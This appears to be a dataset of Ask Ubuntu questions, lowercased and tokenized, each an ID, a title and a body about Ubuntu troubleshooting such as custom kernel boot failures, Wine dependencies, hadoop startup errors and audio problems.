476891	after installing a new kernel in ubuntu 14.04 , rebooting takes me to busybox initramfs . how do i mount a filesystem after that ?	i have a virtual machine with ubuntu 14.04 in it . i recently built and installed linux-3.14.5 kernel on it , and tried to boot into it , but it drops me to busybox v1.21.1 built-in shell . here 's what i did : wget https : //www.kernel.org/pub/linux/kernel/v3.x/linux-3.14.5.tar.xz mkdir ~/linux mv linux-3.14.5.tar.xz ~/linux tar -xjf linux-3.14.5.tar.xz mkdir linux-3.14.5 cd linux-3.14.5_src/ make defconfig o=../linux-3.14.5 make menuconfig o=../linux-3.14.5 /* i did n't change anything */ make o=../linux-3.14.5 cd ../linux-3.14.5 sudo make install i could see a file called initrd.img-3.14.5 in /boot alongside the intrd.img-3.13.0-24-generic ( which i guess , is the kernel of ubuntu 14.04 ) . there were also 2 files called vmlinuz-3.14.5 and vmlinuz-3.13.0-24-generic . after that , ran sudo blkid and got the following : /dev/sda1 : uuid= '' 92ec153c-cb92-4300-8d2a-f63b747ddd35 '' type= '' ext4 '' /dev/sda5 : uuid= '' 439a6423-28dc-4363-b47e-580f1e65e951 '' type= '' swap '' i also ran sudo fdisk -l which gave me disk /dev/sda : 21.5 gb , 21474836480 bytes 255 heads , 63 sectors/track , 2610 cylinders , total 41943040 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000268be device boot start end blocks id system /dev/sda1 * 2048 39845887 19921920 83 linux /dev/sda2 39847934 41940991 1046529 5 extended /dev/sda5 39847936 41940991 1046528 82 linux swap / solaris i checked the /boot/grub/grub.cfg file which had the following entry : menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-92ec153c-cb92-4300-8d2a-f63b747ddd35 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 92ec153c-cb92-4300-8d2a-f63b747ddd35 else search -- no-floppy -- fs-uuid -- set=root 92ec153c-cb92-4300-8d2a-f63b747ddd35 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=92ec153c-cb92-4300-8d2a-f63b747ddd35 ro find_preseed=/preseed.cfg auto noprompt priority=critical locale=en_us quiet echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } so , i went ahead and added the following lines to /etc/grub.d/40_custom ( i just changed lines 1 , 14 , 15 and 17 ) menuentry 'mynewkernel ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 92ec153c-cb92-4300-8d2a-f63b747ddd35 else search -- no-floppy -- fs-uuid -- set=root 92ec153c-cb92-4300-8d2a-f63b747ddd35 fi echo 'loading my new kernel ... ' linux /boot/vmlinuz-3.14.5 root=uuid=92ec153c-cb92-4300-8d2a-f63b747ddd35 ro recovery nomodeset find_preseed=/preseed.cfg auto noprompt priority=critical locale=en_us echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.14.5 } and ran sudo update-grub sudo reboot did not work ! the error message said alert ! /dev/disk/by-uuid/92ec153c-cb92-4300-8d2a-f63b747ddd35 does not exist . dropping to a shell ! so i tried replacing the uuid by /dev/sda1 resulting in the following file . menuentry 'mynewkernel ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 /dev/sda1 else search -- no-floppy -- fs-uuid -- set=root /dev/sda1 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.14.5 root=/dev/sda1 ro recovery nomodeset find_preseed=/preseed.cfg auto noprompt priority=critical locale=en_us echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.14.5 } that did not work either , and gave me a very similar error message . alert ! /dev/sda1 does not exist . dropping to a shell ! i think i am doing some stupid mistake , but i cant figure out what , since this is my first time . i would appreciate any help . thanks for reading through the long post . please let me know if you need any more information . ps . i cant post pictures due to a lack of reputation .
476892	running a screen instance of a program as non-root	i 've got a dedicated server ( ubuntu 12.04 , no gui ) set up to launch an instance of mcmyadmin and attach it to a screen instance every time i reboot the hardware . i have the command saved to root 's crontab as : @ reboot cd /var/mc_svr & & screen -dms mcmyadmin ./mcma2_linux_x86_64 problem being , though , i have a user set up specifically for ftp access to the server files so i do n't always have to ssh into the machine . since the server is being started as a root process , all the files it makes are , obviously , set with root as the owner . so i chown 'd all the files and set them to ftpuser . now i 'm stuck with trying to get the process to start as ftpuser . i 've tried doing the following but to no avail : cd /var/mc_svr & & su ftpuser - -c 'screen -dms mcmyadmin ./mcma2_linux_x86_64' i try this in terminal and i get no errors or anything ( in fact i never get anything unless it 's a syntax error from su ) , but there 's no screen instance to access and so i can assume the server never starts . so , what am i doing wrong ? or am i just not accessing the screen instance correctly since it 's ( supposed ) to be launched by another user ?
476894	maas create iso and add node	( 1 ) how can i add existing ubuntu 14.04 server or desktop to ubuntu 14.04 maas ? ( 2 ) is there way to build maas iso similar to cobbler iso ? http : //www.cobblerd.org/manuals/2.6.0/3/2/6_-_build_iso.html thanks ,
476895	what do i do for dependencies installing wine1.7 on 14.04	user @ chrubuntu : ~ $ sudo apt-get install wine1.7 [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.7 : depends : wine1.7-i386 ( = 1:1.7.19-0ubuntu2~trusty2 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : ttf-wqy-microhei recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . user @ chrubuntu : ~ $ trying to install wine1.7 on ubuntu 14.04 64 bit , and i 'm not sure what this means , help is greatly appreciated . i already ran sudo apt-get update and get this : reading package lists ... done w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : you may want to run apt-get update to correct these problems so i run apt-get update and : e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? this is all very stressing because i have been trying to get wine for the past week and had to reinstall and it still wo n't work .
476898	how do i remove unwanted sensors from the psensor main panel ?	is there any way to remove the other sensors that i am not drawing on the graph ? i would have thought that the option under psensor - > sensor preferences - > `` display sensor in the application indicator menu '' implies it would not be listed in the right-hand panel of the main screen . unticked boxes showing what i would have assumed removes this sensor from the main screen : the opposite :
476903	why does the terminal not hold my root password for sudo ?	i stopped using ubuntu for a while ( since 12.10 ) and recently came back to it . from what i remember , it used to only ask for the root password once for a terminal session ( for sudo commands ) . now it asks me everytime i want to sudo something . is there a way to fix this ? or is this intentional ? the same thing happens with git . i have enter my credentials everytime i want to commit . i know my friends on on mac do n't need to do this . are the two issues related ? any help would be appreciated . thanks in advance !
476905	imac late 2013 audio cirrus logic cs4206 issues	i have just switched from osx to xubuntu 14.04 on my imac late 2013 . i 've got everything running smooth , except for my freakin ' audio card . it works occasionally for a few minutes and then it just stops . i ca n't hear anything , but the sound indicator in the sound settings is moving . i followed every single possible solution on askubuntu and the unbuntu forums but i could n't get it to work permanently . the only thing that kinda works for me is force reloading the pulse audio driver . but i got ta do that a couple of times , including logins and log outs to reactive the sound for a few minutes . i really do n't want to give up , and hope you guys can help me figure this one out . i do n't want to go back to osx , i really like my new found freedom ! let me know if you need more information , any help would be greatly appreciated ! **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : cs4206 analog [ cs4206 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : cs4206 digital [ cs4206 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card : hda intel pch chip : cirrus logic cs4206
476907	how do i enable flash 11.2 in chrome ?	i 'm trying to force chrome to use flash 11.2 rather than the packaged pepper version because it does n't support drm and i want to be able to use amazon instant video/hbo go . i followed adobe 's instructions to a tee but when i restart chrome and view the plugins , the pepper flash version is still the only one available . i have expanded the details and am certain i have not just missed the other version . i checked the directories where the files were being copied to verify that it worked and it appears that they successfully copied without issue . unfortunately , since i did n't run into any problems until finding that it just did n't work , i do n't have many other details that might help shed some light on this . i 'm crossing my fingers though and hoping that someone else might have had some experience with this . thanks in advance . version info ubuntu - 14.04 chrome - 35.0.1916.114 flash i 'm trying to install - 11.2.202.359 flash packaged with chrome ( pepper ) - 13.0.0.214
476911	in 14.04 , how do i print the current keyboard layout ?	i have several keyboard entry languages set up , and can easily select the one i want to use from the indicator menu . once a language is chosen , the menu item `` keyboard layout chart '' shows me what key generates what . how do i print the keyboard layout chart in ubuntu 14.04 ? there is no print button on the chart and there is no menu associated with the layout chart window . perhaps this is a but in 14.04 ?
476912	ubuntu 14.04 dual installation with xp - no launcher	being absolutely new to ubuntu , i tried installing 14.04 parallel to windows xp on an old dell dimension 9150 . used a memory stick to boot . all seemed to go fine , till the system asked me to restart . the result now is the following : i have a grub screen with ubuntu , xp and some other lines . when i start ubuntu ( or let it start after time-out ) , it gets me to the password login . after typing the password , the screen goes empty , just the cursor and the line `` ubuntu 14.04 lts '' in the bottom left corner . no development from here , no reaction . i can start xp via grub all right , no problems after several tries with the other grub lines , i managed to start ubuntu via recovery mode . took a bit of confidence to see al the action on screen , but that way i can use ubuntu seemingly withour problems . i tried to re-install several times , but the result is always the same . as the computer is to be used by somebody less computer-literate than myself , i would love to have it start from the first grub line directly .
476913	window phone only recognized as a camera on ubuntu	i have a nokia lumia 520 windows 7 phone . when i plug the phone into my ubuntu pc , ubuntu only recognizes it as a camera . i can not transfer music from the pc to the phone . i can only move photos . i can open the phone and see the file folders on ubuntu . but when i copy music files from the pc to paste in the phone music folders it seems to be transfering the files , and you can see the new music files in the folders of the phone . however when the phone is then disconnected from the pc , the files are not found in the phone anywhere . what am i doing wrong ?
476918	google chrome wont start after changing hostname	i tried to start google chrome in terminal several times , and i keep receiving the following message : ... : error : process_singleton_linux.cc ( 309 ) ] the profile appears to be in use by another google chrome process ( 8629 ) on another computer ( `` previous name of the computer '' ) . chrome has locked the profile so that it does n't get corrupted . if you are sure no other processes are using this profile , you can unlock the profile and relaunch chrome . ... : error : simple_message_box_views.cc ( 208 ) ] unable to show a dialog outside the ui thread message loop : google chrome - the profile appears to be in use by another google chrome process ( 8629 ) on another computer ( `` previous name of the computer '' ) . chrome has locked the profile so that it does n't get corrupted . if you are sure no other processes are using this profile , you can unlock the profile and relaunch chrome . any suggestions ? thanks in advance .
476923	ca n't get lexmark pro901 working in 12.4 . says job-stopped	pinnacle pro901 printer is installed and has a green check , is enabled , accepting jobs and shared . when i try to print in windows it works . when i try ubuntu it says processing and then stopped . i hear no communication with the printer . in attributes it says job-stopped
476924	mounting a new hard drive ( sda1 ) to my existing filesystem	i tried to read some posts regarding mounting a new hard drive , but i am facing some problem . my new hard drive is sda1 . the output of sudo fdisk -l is : sudo fdisk -l disk /dev/sdb : 999.7 gb , 999653638144 bytes 255 heads , 63 sectors/track , 121534 cylinders , total 1952448512 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00016485 device boot start end blocks id system /dev/sdb1 * 2048 1935822847 967910400 83 linux /dev/sdb2 1935824894 1952446463 8310785 5 extended /dev/sdb5 1935824896 1952446463 8310784 82 linux swap / solaris disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x78dbcdc1 device boot start end blocks id system /dev/sda1 2048 1953521663 976759808 7 hpfs/ntfs/exfat what should be done to add this new sda1 hard drive on booting up ? what should be added in the /etc/fstab file ? i have not performed any partition on the new sda1 drive . i need help on how to proceed from scratch and ca n't afford to take any risk . please help !
476926	hard drive has not enough space for installing ubuntu	after windows 8 crashed on my samsung laptop , i decided to move on to ubuntu as my new os . but when i tried to install the full version i 've found out that i only have a 3.0 gb space on a hardrive that is supposed to have over 250 gb . tried to find the hard drive with gparted but nothing appears on it . how can i reactive my hard drive ? thx
476927	a couple of minor issues after upgrading to ubuntu 14.04	hey guys so i just upgraded to ubuntu 14.04 and i 'm having a couple of issues that i ca n't find an answer for : 1 ) dropbox icon is very large in the gnome menu , very annoying . 2 ) variety will remove desktop icons when switching wallpapers . i can re-enable them through the ubuntu tweak tool but i would have to do it every time that it changes a wallpaper .
476930	ubuntu desktop does not load	if i login on my ubuntu 14.04 , i get the following desktop : this weird behavior appeared after i executed sudo apt-get update & & sudo apt-get upgrade and restarted my computer . do n't know why though . to my ubuntu i have tried the following ( nothing seems to work so far ) fix any broken packages : sudo apt-get update sudo apt-get autoclean sudo apt-get clean sudo apt-get autoremove locate any broken packages and reinstall them : sudo apt-get install debsums sudo apt-get clean sudo debsums_init sudo debsums -cs sudo apt-get install -- reinstall $ ( sudo dpkg -s $ ( sudo debsums -c ) | cut -d : -f 1 | sort -u ) removing some compiz files : rm -r ~/.cache/compizconfig-1 rm -r ~/.compiz purging of nvidia and installing nvidia-prime : sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity sudo apt-get purge nvidia* bumblebee* sudo apt-get install nvidia-prime sudo shutdown -r now compizconfig settings manager : sudo apt-get install compizconfig-settings-manager export display=:0 ccsm // back to ui and enablement of unity plugin unity replace , which stopped at a while and did nothing afterwards unity -- replace some dconf reset dconf reset -f /org/compiz/ unity -- reset-icons & disown actually dconf did not work and i got this error : error : can not autolaunch d-bus without x11 $ display can anybody help me on that ? this is my hardware ( hope it helps in any way ) : intelâž coreâ˘ i7-3770 asus gtx660ti-dc2-og-2gd5 ( nvidia driver is/was installed ) asus p8z77-v lx corsair dimm 8 gb ddr3-1600 kit samsung 830series 2,5 '' 256 gb ( windows is installed here ) seagate st31000524as 1 tb ( 3/4 are reserved for files ; 1/4 is for ubuntu ( 16gb swap included ) )
476933	how do i configure the mouse to raise and lower windows	i 've just installed 14.04 and can not find the congfuration screen to control how mouse clicks are acted on by the window manager , and then optionally passed to the application . i want to set the sane traditional unix behaviour of : - 'focus follows mouse ' : done . - 'never auto-raise ' : done . - 'raise when click on border or title ' : ca n't find the option . a middle button click on the tile does lower a window - but traditionally it would also raise the botton window . i can set 'raise on any click ' - but that is absolutely hopeless when you are trying to copy text from a lower window .
476934	problem with hadoop start-dfs.sh	i installed and configured hadoop on my ubuntu 14.04 server , virtualized inside of hyper-v , however i am getting an issue when i run start-dfs.sh root @ subuntu01 : /var/log # start-dfs.sh 14/06/04 15:27:08 warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable starting namenodes on [ openjdk 64-bit server vm warning : you have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c < libfile > ' , or link it with '-z noexecstack ' . localhost ] sed : -e expression # 1 , char 6 : unknown option to `s' -c : unknown cipher type 'cd' localhost : ubuntu 14.04 lts localhost : starting namenode , logging to /usr/local/hadoop/logs/hadoop-root-namenode-subuntu01.out noexecstack ' . : ssh : could not resolve hostname noexecstack ' . : name or service not known '-z : ssh : could not resolve hostname '-z : name or service not known 'execstack : ssh : could not resolve hostname 'execstack : name or service not known disabled : ssh : could not resolve hostname disabled : name or service not known with : ssh : could not resolve hostname with : name or service not known have : ssh : could not resolve hostname have : name or service not known vm : ssh : could not resolve hostname vm : name or service not known stack : ssh : could not resolve hostname stack : name or service not known guard : ssh : could not resolve hostname guard : name or service not known fix : ssh : could not resolve hostname fix : name or service not known vm : ssh : could not resolve hostname vm : name or service not known the : ssh : could not resolve hostname the : name or service not known to : ssh : could not resolve hostname to : name or service not known warning : : ssh : could not resolve hostname warning : : name or service not known it : ssh : could not resolve hostname it : name or service not known now . : ssh : could not resolve hostname now . : name or service not known library : ssh : could not resolve hostname library : name or service not known will : ssh : could not resolve hostname will : name or service not known link : ssh : could not resolve hostname link : name or service not known or : ssh : could not resolve hostname or : name or service not known it 's : ssh : could not resolve hostname it 's : name or service not known < libfile > ' , : ssh : could not resolve hostname < libfile > ' , : name or service not known which : ssh : connect to host which port 22 : connection timed out have : ssh : connect to host have port 22 : connection timed out you : ssh : connect to host you port 22 : connection timed out try : ssh : connect to host try port 22 : connection timed out the : ssh : connect to host the port 22 : connection timed out highly : ssh : connect to host highly port 22 : connection timed out might : ssh : connect to host might port 22 : connection timed out loaded : ssh : connect to host loaded port 22 : connection timed out you : ssh : connect to host you port 22 : connection timed out guard . : ssh : connect to host guard . port 22 : connection timed out library : ssh : connect to host library port 22 : connection timed out server : ssh : connect to host server port 22 : connection timed out fix : ssh : connect to host fix port 22 : connection timed out the : ssh : connect to host the port 22 : connection timed out recommended : ssh : connect to host recommended port 22 : connection timed out that : ssh : connect to host that port 22 : connection timed out stack : ssh : connect to host stack port 22 : connection timed out openjdk : ssh : connect to host openjdk port 22 : connection timed out 64-bit : ssh : connect to host 64-bit port 22 : connection timed out with : ssh : connect to host with port 22 : connection timed out localhost : ubuntu 14.04 lts localhost : starting datanode , logging to /usr/local/hadoop/logs/hadoop-root-datanode-subuntu01.out localhost : openjdk 64-bit server vm warning : you have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . localhost : it 's highly recommended that you fix the library with 'execstack -c < libfile > ' , or link it with '-z noexecstack ' . starting secondary namenodes [ openjdk 64-bit server vm warning : you have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c < libfile > ' , or link it with '-z noexecstack ' . 0.0.0.0 ] sed : -e expression # 1 , char 6 : unknown option to `s' warning : : ssh : could not resolve hostname warning : : name or service not known -c : unknown cipher type 'cd' it 's : ssh : could not resolve hostname it 's : name or service not known 'execstack : ssh : could not resolve hostname 'execstack : name or service not known '-z : ssh : could not resolve hostname '-z : name or service not known 0.0.0.0 : ubuntu 14.04 lts 0.0.0.0 : starting secondarynamenode , logging to /usr/local/hadoop/logs/hadoop-root-secondarynamenode-subuntu01.out 0.0.0.0 : openjdk 64-bit server vm warning : you have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . 0.0.0.0 : it 's highly recommended that you fix the library with 'execstack -c < libfile > ' , or link it with '-z noexecstack ' . noexecstack ' . : ssh : could not resolve hostname noexecstack ' . : name or service not known < libfile > ' , : ssh : could not resolve hostname < libfile > ' , : name or service not known link : ssh : could not resolve hostname link : no address associated with hostname it : ssh : could not resolve hostname it : no address associated with hostname to : ssh : connect to host to port 22 : connection timed out or : ssh : connect to host or port 22 : connection timed out you : ssh : connect to host you port 22 : connection timed out guard . : ssh : connect to host guard . port 22 : connection timed out vm : ssh : connect to host vm port 22 : connection timed out stack : ssh : connect to host stack port 22 : connection timed out library : ssh : connect to host library port 22 : connection timed out server : ssh : connect to host server port 22 : connection timed out might : ssh : connect to host might port 22 : connection timed out stack : ssh : connect to host stack port 22 : connection timed out you : ssh : connect to host you port 22 : connection timed out now . : ssh : connect to host now . port 22 : connection timed out disabled : ssh : connect to host disabled port 22 : connection timed out have : ssh : connect to host have port 22 : connection timed out will : ssh : connect to host will port 22 : connection timed out the : ssh : connect to host the port 22 : connection timed out have : ssh : connect to host have port 22 : connection timed out try : ssh : connect to host try port 22 : connection timed out the : ssh : connect to host the port 22 : connection timed out guard : ssh : connect to host guard port 22 : connection timed out the : ssh : connect to host the port 22 : connection timed out recommended : ssh : connect to host recommended port 22 : connection timed out with : ssh : connect to host with port 22 : connection timed out library : ssh : connect to host library port 22 : connection timed out 64-bit : ssh : connect to host 64-bit port 22 : connection timed out fix : ssh : connect to host fix port 22 : connection timed out which : ssh : connect to host which port 22 : connection timed out vm : ssh : connect to host vm port 22 : connection timed out openjdk : ssh : connect to host openjdk port 22 : connection timed out fix : ssh : connect to host fix port 22 : connection timed out highly : ssh : connect to host highly port 22 : connection timed out that : ssh : connect to host that port 22 : connection timed out with : ssh : connect to host with port 22 : connection timed out loaded : ssh : connect to host loaded port 22 : connection timed out 14/06/04 15:36:02 warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable any advice ?
476938	sending emails from existing smtp host from ubuntu server	i feel like my problem is very simple , but i 've been trying for quite some time and have n't cracked it . you experienced server guys will probably laugh at this , but i 'm finally at the point i need help or i 'll never get anywhere . i have a little box running 12.04 lts and i 've wanted to script some status checks and have the server send me an email and schedule this with cron . i basically want a command line mail client that i can set up as easily as thunderbird to send through my existing smtp through the command line . something that can easily be rolled into my bash scripts . i already have a remote host handling our email , smtp , mta , all that garbage . i do n't particularly want to set up a relay just to send email when i have one that everyone else in the company already uses . i 've tried , but there are too many aspects i do n't understand and i do n't see why i should set up something local when we already pay for a remote host to do these things . if i absolutely have to set up sendmail or postfix , then so be it , but i 'd appreciate a simple alternative . i 'm open to practically anything at this point .
476943	noisy audio recording in ubuntu linux	i 'm unable to record audio without noise on my ubuntu laptop . it is not a grounding problem . my windows os is able to record voice without the static noise so , my hardware is fine . i read in the windows forums that the os has software noise filtering mechanism that 's automatically enabled . how do i do the same in ubuntu ? if not , please let me know how to filter the static noise . any help is appreciated . thanks !
476945	can not wakeup suspend com [ puter	i am unable to wake up my suspend ubuntu 13.10 . i click on suspend accidentally and hd led continues flash , but i tried to press any key keyboard , and ctl-alt-ps r-e-i-s-u-b and power button , but can not wake up computer . i had to unplug power and put power back on to reboot computer . i would like to know are there any way to wake up suspend computer ? your help and information is great appreciated , regards , iccsi ,
476946	resetting update manager	how can i fix update manager in 12.04 , which hangs when i try to install any update , while sudo apt-get upgrade works fine ? i strongly suspect it has something to do with my python installation , rather than a bug in the software . this is the error message : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 475 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1622 , in _run_transaction_helper daemon = get_aptdaemon ( self.bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 475 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1622 , in _run_transaction_helper daemon = get_aptdaemon ( self.bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 473 , in _inline_callbacks result = gen.throw ( result.type , result.value , result.traceback ) file `` /usr/lib/python2.7/dist-packages/updatemanager/backend/installbackendaptdaemon.py '' , line 52 , in commit downgrade , defer=true ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1
476950	ubuntu 12.04 server monitor goes into sleep mode ( no display ) after fresh install	for some reason i can boot and either use ubuntu 12.04 server edition , or desktop version . i can live boot the disk , i can go through the installer , or even use the ubuntu alternate installer . but for some reason after the install completes and i reboot the monitor seems to go back into sleep mode and then never loads the command prompt . this is on an industrial adlink mxe-1300 pc . i 've installed ubuntu server fine on other models of adlink machines but this one does n't want to seem to play nice . to me it seems like if it was a video card issue than i could never even load the installer or run ubuntu in live mode . any thoughts or troubleshooting tips would be greatly appreciated .
476951	ubuntu randomly rejecting hosts	currently i am facing a very strange problem : my ubuntu is randomly resetting connections and i have no clue why . /etc/hosts.deny is empty ( resp . just the default file with comments only , that comes with ubuntu ) i already purged ufw off the system and iptables is set to accept everything : root @ template-ubuntu-12 : ~ # iptables -l -v chain input ( policy accept 43 packets , 6118 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 16 packets , 1520 bytes ) pkts bytes target prot opt in out source destination this is my current release : root @ template-ubuntu-12 : ~ # uname -a linux template-ubuntu-12 3.13.0-27-generic # 50~precise1-ubuntu smp fri may 16 20:47:56 utc 2014 x86_64 x86_64 x86_64 gnu/linux here is an example - suddenly in the middle of typing something in an ssh session i get disconnected : tzhwiman @ template-ubuntu-12 : ~ $ u [ local ] : stream has closed [ close_type_nonspecific ] : connection was reset . [ local ] : changing state from state_connection to state_closed [ local ] : discarding invalid state change from state_closed to state_almost_closed . [ local ] : connected for 331 seconds , 1819 bytes sent , 3713 bytes received connection was reset . also i 'm not able to reconnect for a random amount of time . but : i can login from another source without any problems . i also found that i can recover connectivity if i login from another host/source and then ping the host that is currently blocked ( note that when a host is blocked always the first few pings get lost ) : ping x.x.126.19 ( x.x.126.19 ) 56 ( 84 ) bytes of data . 64 bytes from x.x.126.19 : icmp_req=2 ttl=128 time=0.526 ms 64 bytes from x.x.126.19 : icmp_req=3 ttl=128 time=0.499 ms 64 bytes from x.x.126.19 : icmp_req=4 ttl=128 time=0.459 ms ^c -- - x.x.126.19 ping statistics -- - 4 packets transmitted , 3 received , 25 % packet loss , time 2999ms rtt min/avg/max/mdev = 0.459/0.494/0.526/0.037 ms strange enough ping ( icmp ) from the host that is blocked ( to the ubuntu ) is always working , but i can not connect to ssh ( port 22 ) nor to the webserver ( port 80 ) . i analyzed the traffic and for each tcp syn i immediately get a tcp rst . where can i check/debug more ? i already had a look at /var/log/syslog auth.log kern.log but i could n't find anything suspicious
476958	how to transform a desktop version of ubuntu iso into a server one ?	as i understand , desktop and server distributions of ubuntu are very similar , except that some packages are included in one but not another . i need to install ubuntu server from pxe . since there is no way to install official ubuntu server from pxe , but is easy to do with the desktop variant , what do i need to do to change the list of packages ( and only that ) on an ubuntu desktop iso in order to be able to have an ubuntu server variant ?
